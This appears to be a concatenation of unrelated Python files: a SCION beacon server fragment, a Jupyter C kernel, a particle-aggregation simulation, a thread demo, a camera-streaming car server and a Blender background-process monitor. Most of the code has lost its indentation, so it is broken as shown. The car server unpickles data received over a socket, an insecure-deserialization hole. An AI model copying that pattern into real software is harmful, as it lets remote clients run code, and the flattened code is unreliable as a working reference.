def _log_registrations(self, registrations, seg_type):
reg_cnt = 0
for (dst_meta, dst_type), pcbs in registrations.items():
reg_cnt += len(pcbs)
logging.debug("Registered %d %s-segments @ %s:%s (%s)", len(pcbs),
seg_type, dst_type.upper(), dst_meta, ", ".join(pcbs))
if self._labels:
SEGMENTS_REGISTERED.labels(**self._labels, type=seg_type).inc(reg_cnt)
def _create_asm(self, in_if, out_if, ts, prev_hof):
pcbms = list(self._create_pcbms(in_if, out_if, ts, prev_hof))
if not pcbms:
return None
chain = self._get_my_cert()
_, cert_ver = chain.get_leaf_isd_as_ver()
return ASMarking.from_values(
self.addr.isd_as, self._get_my_trc().version, cert_ver, pcbms, self.topology.mtu)
def _create_pcbms(self, in_if, out_if, ts, prev_hof):
up_pcbm = self._create_pcbm(in_if, out_if, ts, prev_hof)
if not up_pcbm:
return
yield up_pcbm
for intf in sorted(self.topology.peer_interfaces):
in_if = intf.if_id
with self.ifid_state_lock:
if (not self.ifid_state[in_if].is_active() and
not self._quiet_startup()):
continue
peer_pcbm = self._create_pcbm(in_if, out_if, ts, up_pcbm.hof(), xover=True)
if peer_pcbm:
yield peer_pcbm
def _create_pcbm(self, in_if, out_if, ts, prev_hof, xover=False):
in_info = self._mk_if_info(in_if)
if in_info["remote_ia"].int() and not in_info["remote_if"]:
return None
out_info = self._mk_if_info(out_if)
if out_info["remote_ia"].int() and not out_info["remote_if"]:
return None
exp_time = self.hof_exp_time(ts)
if exp_time < 0:
logging.error("Invalid hop field expiration time value: %s", exp_time)
return None
hof = HopOpaqueField.from_values(exp_time, in_if, out_if, xover=xover)
hof.set_mac(self.of_gen_key, ts, prev_hof)
return PCBMarking.from_values(
in_info["remote_ia"], in_info["remote_if"], in_info["mtu"],
out_info["remote_ia"], out_info["remote_if"], hof)
def _terminate_pcb(self, pcb):
"""
Copies a PCB, terminates it and adds the segment ID.
Terminating a PCB means adding a opaque field with the egress IF set
to 0, i.e., there is no AS to forward a packet containing this path
segment to.
"""
pcb = pcb.copy()
asm = self._create_asm(pcb.ifID, 0, pcb.get_timestamp(),
pcb.last_hof())
if not asm:
return None
pcb.add_asm(asm, ProtoSignType.ED25519, self.addr.isd_as.pack())
return pcb
def handle_ifid_packet(self, cpld, meta):
"""
Update the interface state for the corresponding interface.
:param pld: The IFIDPayload.
:type pld: IFIDPayload
"""
pld = cpld.union
assert isinstance(pld, IFIDPayload), type(pld)
ifid = meta.pkt.path.get_hof().ingress_if
with self.ifid_state_lock:
if ifid not in self.ifid_state:
raise SCIONKeyError("Invalid IF %d in IFIDPayload" % ifid)
br = self.ifid2br[ifid]
br.interfaces[ifid].to_if_id = pld.p.origIF
prev_state = self.ifid_state[ifid].update()
if prev_state == InterfaceState.INACTIVE:
logging.info("IF %d activated.", ifid)
elif prev_state in [InterfaceState.TIMED_OUT,
InterfaceState.REVOKED]:
logging.info("IF %d came back up.", ifid)
if prev_state != InterfaceState.ACTIVE:
if self.zk.have_lock():
# Inform BRs about the interface coming up.
metas = []
for br in self.topology.border_routers:
br_addr, br_port = br.ctrl_addrs.public
metas.append(UDPMetadata.from_values(host=br_addr, port=br_port))
info = IFStateInfo.from_values(ifid, True)
self._send_ifstate_update([info], metas)
def run(self):
"""
Run an instance of the Beacon Server.
"""
threading.Thread(
target=thread_safety_net, args=(self.worker,),
name="BS.worker", daemon=True).start()
# https://github.com/scionproto/scion/issues/308:
threading.Thread(
target=thread_safety_net, args=(self._send_ifid_updates,),
name="BS._send_if_updates", daemon=True).start()
threading.Thread(
target=thread_safety_net, args=(self._handle_if_timeouts,),
name="BS._handle_if_timeouts", daemon=True).start()
threading.Thread(
target=thread_safety_net, args=(self._check_trc_cert_reqs,),
name="Elem.check_trc_cert_reqs", daemon=True).start()
threading.Thread(
target=thread_safety_net, args=(self._check_local_cert,),
name="BS._check_local_cert", daemon=True).start()
super().run()
def worker(self):
"""
Worker thread that takes care of reading shared PCBs from ZK, and
propagating PCBS/registering paths when master.
"""
last_propagation = last_registration = 0
worker_cycle = 1.0
start = time.time()
while self.run_flag.is_set():
sleep_interval(start, worker_cycle, "BS.worker cycle",
self._quiet_startup())
start = time.time()
# Update IS_MASTER metric.
if self._labels:
IS_MASTER.labels(**self._labels).set(int(self.zk.have_lock()))
try:
self.zk.wait_connected()
self.pcb_cache.process()
self.revobjs_cache.process()
self.handle_rev_objs()
ret = self.zk.get_lock(lock_timeout=0, conn_timeout=0)
if not ret: # Failed to get the lock
continue
elif ret == ZK_LOCK_SUCCESS:
logging.info("Became master")
self._became_master()
self.pcb_cache.expire(self.config.propagation_time * 10)
self.revobjs_cache.expire(self.ZK_REV_OBJ_MAX_AGE)
except ZkNoConnection:
continue
now = time.time()
if now - last_propagation >= self.config.propagation_time:
self.handle_pcbs_propagation()
last_propagation = now
if (self.config.registers_paths and
now - last_registration >= self.config.registration_time):
try:
self.register_segments()
except SCIONKeyError as e:
                    logging.error("Error while registering segments: %s", e)
last_registration = now
def _became_master(self):
"""
Called when a BS becomes the new master. Resets some state that will be
rebuilt over time.
"""
# Reset all timed-out and revoked interfaces to inactive.
with self.ifid_state_lock:
for (_, ifstate) in self.ifid_state.items():
if not ifstate.is_active():
ifstate.reset()
def _get_my_trc(self):
return self.trust_store.get_trc(self.addr.isd_as[0])
def _get_my_cert(self):
return self.trust_store.get_cert(self.addr.isd_as)
@abstractmethod
def _handle_verified_beacon(self, pcb):
"""
Once a beacon has been verified, place it into the right containers.
:param pcb: verified path segment.
:type pcb: PathSegment
"""
raise NotImplementedError
def process_rev_objects(self, rev_infos):
"""
Processes revocation infos stored in Zookeeper.
"""
with self._rev_seg_lock:
for raw in rev_infos:
try:
srev_info = SignedRevInfo.from_raw(raw)
except SCIONParseError as e:
logging.error(
"Error parsing revocation info from ZK: %s", e)
continue
self.check_revocation(srev_info, lambda x: lambda:
self.local_rev_cache.add(srev_info) if not x else False)
def _issue_revocations(self, revoked_ifs):
"""
Store a RevocationInfo in ZK and send a revocation to all BRs.
:param list revoked_ifs: A list of interfaces that needs to be revoked.
"""
# Only the master BS issues revocations.
if not self.zk.have_lock():
return
# Process revoked interfaces.
infos = []
for if_id in revoked_ifs:
br = self.ifid2br[if_id]
rev_info = RevocationInfo.from_values(
self.addr.isd_as, if_id, br.interfaces[if_id].link_type,
int(time.time()), self.REVOCATION_TTL)
logging.info("Issuing revocation: %s", rev_info.short_desc())
if self._labels:
REVOCATIONS_ISSUED.labels(**self._labels).inc()
chain = self._get_my_cert()
_, cert_ver = chain.get_leaf_isd_as_ver()
src = DefaultSignSrc.from_values(rev_info.isd_as(), cert_ver,
self._get_my_trc().version).pack()
srev_info = SignedRevInfo.from_values(rev_info.copy().pack(),
ProtoSignType.ED25519, src)
srev_info.sign(self.signing_key)
# Add to revocation cache
self.if_revocations[if_id] = srev_info
self._process_revocation(srev_info)
infos.append(IFStateInfo.from_values(if_id, False, srev_info))
metas = []
# Add all BRs.
for br in self.topology.border_routers:
br_addr, br_port = br.ctrl_addrs.public
metas.append(UDPMetadata.from_values(host=br_addr, port=br_port))
# Add local path server.
if self.topology.path_servers:
try:
addr, port = self.dns_query_topo(ServiceType.PS)[0]
except SCIONServiceLookupError:
addr, port = None, None
# Create a meta if there is a local path service
if addr:
metas.append(UDPMetadata.from_values(host=addr, port=port))
self._send_ifstate_update(infos, metas)
def _handle_scmp_revocation(self, pld, meta):
srev_info = SignedRevInfo.from_raw(pld.info.srev_info)
self._handle_revocation(CtrlPayload(PathMgmt(srev_info)), meta)
def _handle_revocation(self, cpld, meta):
pmgt = cpld.union
srev_info = pmgt.union
rev_info = srev_info.rev_info()
assert isinstance(rev_info, RevocationInfo), type(rev_info)
logging.debug("Received revocation from %s: %s", meta, rev_info.short_desc())
self.check_revocation(srev_info, lambda x:
self._process_revocation(srev_info) if not x else False, meta)
def handle_rev_objs(self):
with self._rev_seg_lock:
for srev_info in self.local_rev_cache.values():
self._remove_revoked_pcbs(srev_info.rev_info())
def _process_revocation(self, srev_info):
"""
Removes PCBs containing a revoked interface and sends the revocation
to the local PS.
:param srev_info: The signed RevocationInfo object
:type srev_info: SignedRevInfo
"""
rev_info = srev_info.rev_info()
assert isinstance(rev_info, RevocationInfo), type(rev_info)
if_id = rev_info.p.ifID
if not if_id:
logging.error("Trying to revoke IF with ID 0.")
return
with self._rev_seg_lock:
self.local_rev_cache.add(srev_info.copy())
srev_info_packed = srev_info.copy().pack()
entry_name = "%s:%s" % (hash(srev_info_packed), time.time())
try:
self.revobjs_cache.store(entry_name, srev_info_packed)
except ZkNoConnection as exc:
logging.error("Unable to store revocation in shared cache "
"(no ZK connection): %s" % exc)
self._remove_revoked_pcbs(rev_info)
@abstractmethod
def _remove_revoked_pcbs(self, rev_info):
"""
Removes the PCBs containing the revoked interface.
:param rev_info: The RevocationInfo object.
:type rev_info: RevocationInfo
"""
raise NotImplementedError
def _pcb_list_to_remove(self, candidates, rev_info):
"""
Calculates the list of PCBs to remove.
Called by _remove_revoked_pcbs.
:param candidates: Candidate PCBs.
:type candidates: List
:param rev_info: The RevocationInfo object.
:type rev_info: RevocationInfo
"""
to_remove = []
if not rev_info.active():
return to_remove
processed = set()
for cand in candidates:
if cand.id in processed:
continue
processed.add(cand.id)
# If the interface on which we received the PCB is
# revoked, then the corresponding pcb needs to be removed.
if (self.addr.isd_as == rev_info.isd_as() and
cand.pcb.ifID == rev_info.p.ifID):
to_remove.append(cand.id)
for asm in cand.pcb.iter_asms():
if self._check_revocation_for_asm(rev_info, asm, False):
to_remove.append(cand.id)
return to_remove
def _handle_if_timeouts(self):
"""
Periodically checks each interface state and issues an IF revocation, if
no keep-alive message was received for IFID_TOUT.
"""
while self.run_flag.is_set():
start_time = time.time()
with self.ifid_state_lock:
to_revoke = []
for (ifid, if_state) in self.ifid_state.items():
if self._labels:
metric = IF_STATE.labels(ifid=ifid, **self._labels)
if if_state.is_active():
metric.set(0)
elif if_state.is_revoked():
metric.set(1)
else:
metric.set(2)
if not if_state.is_expired():
# Interface hasn't timed out
self.if_revocations.pop(ifid, None)
continue
srev_info = self.if_revocations.get(ifid, None)
if if_state.is_revoked() and srev_info:
# Interface is revoked until the revocation time plus the revocation TTL,
# we want to issue a new revocation REVOCATION_OVERLAP seconds
# before it is expired
rev_info = srev_info.rev_info()
if (rev_info.p.timestamp + rev_info.p.ttl -
self.REVOCATION_OVERLAP > start_time):
# Interface has already been revoked within the REVOCATION_TTL -
# REVOCATION_OVERLAP period
continue
if not if_state.is_revoked():
logging.info("IF %d went down.", ifid)
to_revoke.append(ifid)
if_state.revoke_if_expired()
if to_revoke:
self._issue_revocations(to_revoke)
sleep_interval(start_time, self.IF_TIMEOUT_INTERVAL, "Handle IF timeouts")
def _handle_ifstate_request(self, cpld, meta):
# Only master replies to ifstate requests.
pmgt = cpld.union
req = pmgt.union
assert isinstance(req, IFStateRequest), type(req)
if not self.zk.have_lock():
return
with self.ifid_state_lock:
infos = []
for (ifid, state) in self.ifid_state.items():
# Don't include inactive interfaces in update.
if state.is_inactive():
continue
srev_info = None
if state.is_revoked():
srev_info = self.if_revocations.get(ifid, None)
if not srev_info:
logging.warning("No revocation in cache for revoked IFID: %s", ifid)
continue
infos.append(IFStateInfo.from_values(ifid, state.is_active(), srev_info))
if not infos and not self._quiet_startup():
logging.warning("No IF state info to put in IFState update for %s.", meta)
return
self._send_ifstate_update(infos, [meta])
def _send_ifstate_update(self, state_infos, server_metas):
payload = CtrlPayload(PathMgmt(IFStatePayload.from_values(state_infos)))
for meta in server_metas:
logging.debug("IFState update to %s:%s", meta.host, meta.port)
self.send_meta(payload.copy(), meta)
def _send_ifid_updates(self):
start = time.time()
while self.run_flag.is_set():
sleep_interval(start, self.IFID_INTERVAL, "BS._send_ifid_updates cycle")
start = time.time()
# only master sends keep-alive messages
if not self.zk.have_lock():
continue
# send keep-alives on all known BR interfaces
for ifid in self.ifid2br:
br = self.ifid2br[ifid]
br_addr, br_port = br.int_addrs.public
one_hop_path = self._create_one_hop_path(ifid)
meta = self._build_meta(ia=br.interfaces[ifid].isd_as, host=SVCType.BS_M,
path=one_hop_path, one_hop=True)
self.send_meta(CtrlPayload(IFIDPayload.from_values(ifid)),
meta, (br_addr, br_port))
def _check_local_cert(self):
while self.run_flag.is_set():
chain = self._get_my_cert()
exp = min(chain.as_cert.expiration_time, chain.core_as_cert.expiration_time)
diff = exp - int(time.time())
if diff > self.config.segment_ttl:
time.sleep(diff - self.config.segment_ttl)
continue
cs_meta = self._get_cs()
req = CertChainRequest.from_values(
self.addr.isd_as, chain.as_cert.version+1, cache_only=True)
logging.info("Request new certificate chain. Req: %s", req)
self.send_meta(CtrlPayload(CertMgmt(req)), cs_meta)
cs_meta.close()
time.sleep(self.CERT_REQ_RATE)
def _init_metrics(self):
super()._init_metrics()
for type_ in ("core", "up", "down"):
BEACONS_PROPAGATED.labels(**self._labels, type=type_).inc(0)
SEGMENTS_REGISTERED.labels(**self._labels, type=type_).inc(0)
REVOCATIONS_ISSUED.labels(**self._labels).inc(0)
IS_MASTER.labels(**self._labels).set(0)
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import re
import subprocess
import tempfile
import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
A subprocess that allows to read its stdout and stderr in real time
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
def wait_for_threads(self):
self._stdout_thread.join()
self._stderr_thread.join()
def write_contents(self):
"""
        Write the available content from stdout and stderr where specified when the instance was created
:return:
"""
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
class CKernel(Kernel):
implementation = 'jupyter_c_kernel'
implementation_version = '1.0'
language = 'c'
language_version = 'C11'
language_info = {'name': 'c',
'mimetype': 'text/plain',
'file_extension': '.c'}
banner = "C kernel.\n" \
"Uses gcc, compiles in C11, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(CKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), 'resources', 'master.c')
subprocess.call(['gcc', filepath, '-std=c11', '-rdynamic', '-ldl', '-o', self.master_path])
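        # resources/master.c is compiled once per kernel instance; given the -rdynamic/-ldl
        # flags it appears to be a small launcher that dlopen()s the per-cell shared objects
        # built in do_execute (an assumption based on the flags, not verified here).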
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
    def compile_with_gcc(self, source_filename, binary_filename, cflags=None, ldflags=None):
        cflags = ['-std=c11', '-fPIC', '-shared', '-rdynamic'] + (cflags or [])
        args = ['gcc', source_filename] + cflags + ['-o', binary_filename] + (ldflags or [])
return self.create_jupyter_subprocess(args)
def _filter_magics(self, code):
magics = {'cflags': [],
'ldflags': [],
'args': []}
for line in code.splitlines():
if line.startswith('//%'):
                key, value = line[3:].split(":", 1)
key = key.strip().lower()
if key in ['ldflags', 'cflags']:
for flag in value.split():
magics[key] += [flag]
elif key == "args":
# Split arguments respecting quotes
for argument in re.findall(r'(?:[^\s,"]|"(?:\\.|[^"])*")+', value):
magics['args'] += [argument.strip('"')]
return magics
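    # Magics are ordinary C comments of the form //%key: value, for example:
    #   //%cflags: -O2 -Wall
    #   //%ldflags: -lm
    #   //%args: "hello world" 42
    # cflags/ldflags are split on whitespace, while args keeps quoted strings together.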
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
magics = self._filter_magics(code)
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name, magics['cflags'], magics['ldflags'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[C kernel] GCC exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name] + magics['args'])
while p.poll() is None:
p.write_contents()
p.wait_for_threads()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[C kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
|
simulation.py
|
import logging
import constant
import time
import random
from threading import Thread
from tkinter import *
from enum import Enum
class State(Enum):
'''Simulation states'''
NOT_INITIALIZED = 1
INITIALIZED = 2
STARTED = 3
class Simulation:
'''Simulation of a diffusion limited aggregation.'''
def __init__(self, size):
'''Constructor'''
self.state = State.NOT_INITIALIZED
self.size = size
self.color = 0x773333
self.color_negate = False
self.points = {}
def initialize_simulation(self):
'''Initializes the simulation'''
self.assert_state(State.NOT_INITIALIZED)
logging.debug("Initializing simulation.")
self.initialize_gui()
self.state = State.INITIALIZED
def start_simulation(self):
'''Start simulation'''
self.assert_state(State.INITIALIZED)
logging.debug("Starting simulation.")
self.state = State.STARTED
self.thread = Thread(group=None, target=self.run, name=constant.SHORT_NAME)
self.thread.start()
mainloop()
def stop_simulation(self):
'''Stop simulation'''
self.assert_state(State.STARTED)
logging.debug("Stopping simulation.")
self.state = State.NOT_INITIALIZED
def initialize_gui(self):
logging.debug("Initializing window.")
window = Tk()
window.title(constant.NAME)
canvas = Canvas(window, width=self.size, height=self.size, bg="#000000")
canvas.pack()
self.img = PhotoImage(width=self.size, height=self.size)
canvas.create_image((self.size // 2, self.size // 2), image = self.img, state="normal")
def run(self):
'''Runs the simulation'''
logging.debug("Running simulation.")
self.assert_state(State.STARTED)
self.initialize_points()
self.create_anchor_line()
while self.state == State.STARTED:
#create random x and y from which the random walk starts
x = int(self.size * random.random())
y = self.size - 10
self.random_walk(x, y)
def initialize_points(self):
'''Initializes the points map'''
for x in range(self.size):
for y in range(self.size):
self.points[x, y] = False
def create_anchor_line(self):
'''Creates an anchor of points to which the particles can dock to'''
for x in range(self.size):
self.points[x, 0] = True
self.draw_point(x, 0)
def random_walk(self, x, y):
'''Random walk algorithm to move a particle until it touches another particle'''
while self.is_in_bounds(x, y):
x, y = self.apply_random_step(x, y)
if self.is_touching(x, y):
self.on_touching(x, y)
return # random walk is over because a touching particle exists
def apply_random_step(self, x, y):
'''Randomly increases or decreases x and/or y'''
direction = random.random()
if direction < 0.25:
x -= 1
elif direction < 0.5:
x += 1
elif direction < 0.65:
y += 1
else:
y -= 1
return (x, y)
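        # Step distribution: 25% left, 25% right, 15% away from the seed row (y + 1) and
        # 35% toward it (y - 1), so walkers drift toward the anchor line created at y == 0.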
def is_in_bounds(self, x, y):
'''Whether the given coordinates are in bounds'''
return x < self.size - 2 and x > 1 and y < self.size - 2 and y > 1
def is_touching(self, x, y):
'''Checks whether the given coordinates are touching an existing particle'''
#r = right, l = left, u = up, d = down
r = self.points[x + 1, y]
l = self.points[x - 1, y]
u = self.points[x, y + 1]
d = self.points[x, y - 1]
ru = self.points[x + 1, y + 1]
ld = self.points[x - 1, y - 1]
rd = self.points[x + 1, y - 1]
lu = self.points[x - 1, y + 1]
return r or l or u or d or ru or ld or rd or lu
def on_touching(self, x, y):
'''Touching event handler'''
logging.debug(f"Touch detected at {x}:{y}")
self.points[x, y] = True
self.draw_point(x, y)
if y > self.size - 10:
self.state = State.NOT_INITIALIZED
def draw_point(self, x, y):
'''Draws a point at the specified coordinates'''
self.img.put("#{0:06X}".format(self.color), (x, y))
self.update_color()
def update_color(self):
'''Updates the color'''
if (self.color_negate):
self.color -= 1
if (self.color < 0x773333):
self.color_negate = False
else:
self.color += 1
if (self.color > 0xFFFFFF - 1):
self.color_negate = True
def assert_state(self, state):
        '''Asserts that the state of this instance is equal to the provided state.'''
if not isinstance(state, State):
logging.error("Illegal instance type of state")
raise TypeError("Passed state is not an enumeration of type State")
assert self.state == state
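# Hedged usage sketch (illustrative only; assumes a display is available and that
# a `constant` module providing NAME/SHORT_NAME is importable):
#
#     sim = Simulation(size=400)
#     sim.initialize_simulation()   # NOT_INITIALIZED -> INITIALIZED, builds the tkinter window
#     sim.start_simulation()        # INITIALIZED -> STARTED, walks particles in a thread, blocks in mainloop()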
|
threds_watcher.py
|
from threading import Thread
import sys
import time
a = 0 # global variable
def thread1(threadname):
global a
b = a
print(f'a {a}, b {b}')
for k in range(50):
print(f'a {a}, b {b}')
if b != a:
print(f'changed a {a}, b {b}')
b = a
time.sleep(0.1)
thread1 = Thread(target=thread1, args=("Thread-1",))
try:
thread1.start()
except (KeyboardInterrupt, SystemExit):
    # no separate cleanup helper is defined in this snippet; just exit
    sys.exit()
# join blocks all other behavior until threads have finished:
# thread1.join()
for k in range(50):
a += 1
time.sleep(0.2)
if k == 5:
a += 100
|
new_server.py
|
import socket, cv2, pickle,struct,traceback,threading
import time
from Car import Car
from tkinter import *
# GPIO setup
car=Car()
# tkinter setup
angle = 1540
quit=False
bnfflag=True
def throttlethread():
def assign_throttle(val):
car.setthrottle(int(val))
def bnffunc():
global bnfflag
if not bnfflag:
car.brake()
bnfflag=not bnfflag
else:
car.forward()
bnfflag=not bnfflag
def quitfunc():
global quit
car.stop()
car.quitfunc()
quit = True
root.destroy()
root = Tk()
root.geometry('600x200')
slider1 = Scale(root, from_=0, to=255, length=400, resolution=1,
orient=HORIZONTAL, command=assign_throttle, variable=angle).pack()
quitme = Button(root, command=quitfunc, text="QUIT",
height=3, width=10).pack(side=LEFT, padx=100)
pauseorresume = Button(root, command=bnffunc, text="pause/resume",
height=3, width=10).pack(side=RIGHT, padx=100)
root.mainloop()
t1 = threading.Thread(target=throttlethread)
t1.start()
# socket setup
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#host_ip = '192.168.29.55'
host_ip='192.168.43.34'
# host_ip='192.168.43.55'
#host_name = socket.gethostname()
#host_ip = socket.gethostbyname(host_name)
port = 9998
print('HOST IP:',host_ip)
socket_address = (host_ip,port)
server_socket.bind(socket_address)
server_socket.listen(5)
print("LISTENING AT:",socket_address)
client_socket,addr = server_socket.accept()
print('Connection From:',addr)
# camera setup
cam=cv2.VideoCapture(0)
while not quit:
try:
if not cam.isOpened():
print("camera errror")
break
res,frame=cam.read()
if not res:
print("problem reading camera")
break
frame=cv2.resize(frame,(320,320))
# cv2.imshow("frame",frame)
# if cv2.waitKey(1) & 0xff ==27 : break
pframe=pickle.dumps(frame)
msg=struct.pack("Q",len(pframe))+pframe
client_socket.sendall(msg)
#msg_size = struct.unpack("Q",msg)[0]
#print(msg_size)
msg=client_socket.recv(100)
rcvmsg=pickle.loads(msg)
print("mesage recvd : ",rcvmsg )
car.steer(int(rcvmsg))
except:
car.stop()
print("something went wrong ")
traceback.print_exc()
client_socket.close()
break
|
bg_blender.py
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
from importlib import reload
utils = reload(utils)
else:
from blenderkit import utils
import bpy
import sys, threading, os
import re
from bpy.props import (
EnumProperty,
)
bg_processes = []
class threadCom: # object passed to threads to read background process stdout info
    '''Object passed between the stdout-reader thread and the bg_update timer on the Blender side.'''
def __init__(self, eval_path_computing, eval_path_state, eval_path, process_type, proc, location=None, name=''):
# self.obname=ob.name
self.name = name
self.eval_path_computing = eval_path_computing # property that gets written to.
self.eval_path_state = eval_path_state # property that gets written to.
self.eval_path = eval_path # property that gets written to.
self.process_type = process_type
self.outtext = ''
self.proc = proc
self.lasttext = ''
self.message = '' # the message to be sent.
self.progress = 0.0
self.location = location
self.error = False
self.log = ''
def threadread(tcom):
    '''Reads stdout of the background process; done this way to keep it non-blocking. This thread basically waits for a stdout line to come in, fills the data, and dies.'''
found = False
while not found:
inline = tcom.proc.stdout.readline()
# print('readthread', time.time())
inline = str(inline)
s = inline.find('progress{')
if s > -1:
e = inline.find('}')
tcom.outtext = inline[s + 9:e]
found = True
if tcom.outtext.find('%') > -1:
                tcom.progress = float(re.findall(r'\d+\.\d+|\d+', tcom.outtext)[0])
return
if s == -1:
s = inline.find('Remaining')
if s > -1:
# e=inline.find('}')
tcom.outtext = inline[s: s + 18]
found = True
return
if len(inline) > 3:
print(inline, len(inline))
# if inline.find('Error'):
# tcom.error = True
# tcom.outtext = inline[2:]
def progress(text, n=None):
'''function for reporting during the script, works for background operations in the header.'''
# for i in range(n+1):
# sys.stdout.flush()
text = str(text)
if n is None:
n = ''
else:
n = ' ' + ' ' + str(int(n * 1000) / 1000) + '% '
spaces = ' ' * (len(text) + 55)
sys.stdout.write('progress{%s%s}\n' % (text, n))
sys.stdout.flush()
@bpy.app.handlers.persistent
def bg_update():
'''monitoring of background process'''
text = ''
s = bpy.context.scene
global bg_processes
if len(bg_processes) == 0:
return 2
for p in bg_processes:
# proc=p[1].proc
readthread = p[0]
tcom = p[1]
if not readthread.is_alive():
readthread.join()
# readthread.
if tcom.error:
estring = tcom.eval_path_computing + ' = False'
exec(estring)
tcom.lasttext = tcom.outtext
if tcom.outtext != '':
tcom.outtext = ''
estring = tcom.eval_path_state + ' = tcom.lasttext'
exec(estring)
# print(tcom.lasttext)
if 'finished successfully' in tcom.lasttext:
bg_processes.remove(p)
estring = tcom.eval_path_computing + ' = False'
exec(estring)
else:
readthread = threading.Thread(target=threadread, args=([tcom]), daemon=True)
readthread.start()
p[0] = readthread
if len(bg_processes) == 0:
bpy.app.timers.unregister(bg_update)
return .1
process_types = (
('UPLOAD', 'Upload', ''),
('THUMBNAILER', 'Thumbnailer', ''),
)
process_sources = (
('MODEL', 'Model', 'set of objects'),
('SCENE', 'Scene', 'set of scenes'),
('MATERIAL', 'Material', 'any .blend Material'),
('TEXTURE', 'Texture', 'a texture, or texture set'),
('BRUSH', 'Brush', 'brush, can be any type of blender brush'),
)
class KillBgProcess(bpy.types.Operator):
'''Remove processes in background.'''
bl_idname = "object.kill_bg_process"
bl_label = "Kill Background Process"
bl_options = {'REGISTER'}
process_type: EnumProperty(
name="Type",
items=process_types,
description="Type of process",
default="UPLOAD",
)
process_source: EnumProperty(
name="Source",
items=process_sources,
description="Source of process",
default="MODEL",
)
def execute(self, context):
s = bpy.context.scene
cls = bpy.ops.object.convert.__class__
# first do the easy stuff...TODO all cases.
props = utils.get_upload_props()
if self.process_type == 'UPLOAD':
props.uploading = False
if self.process_type == 'THUMBNAILER':
props.is_generating_thumbnail = False
global blenderkit_bg_process
# print('killing', self.process_source, self.process_type)
# then go kill the process. this wasn't working for unsetting props and that was the reason for changing to the method above.
processes = bg_processes
for p in processes:
tcom = p[1]
# print(tcom.process_type, self.process_type)
if tcom.process_type == self.process_type:
source = eval(tcom.eval_path)
print(source.bl_rna.name, self.process_source)
print(source.name)
kill = False
if source.bl_rna.name == 'Object' and self.process_source == 'MODEL':
if source.name == bpy.context.active_object.name:
kill = True
if source.bl_rna.name == 'Material' and self.process_source == 'MATERIAL':
if source.name == bpy.context.active_object.active_material.name:
kill = True
if source.bl_rna.name == 'Brush' and self.process_source == 'BRUSH':
brush = utils.get_active_brush()
if brush is not None and source.name == brush.name:
kill = True
if kill:
estring = tcom.eval_path_computing + ' = False'
exec(estring)
processes.remove(p)
tcom.proc.kill()
return {'FINISHED'}
def add_bg_process(location=None, name=None, eval_path_computing='', eval_path_state='', eval_path='', process_type='',
process=None):
'''adds process for monitoring'''
global bg_processes
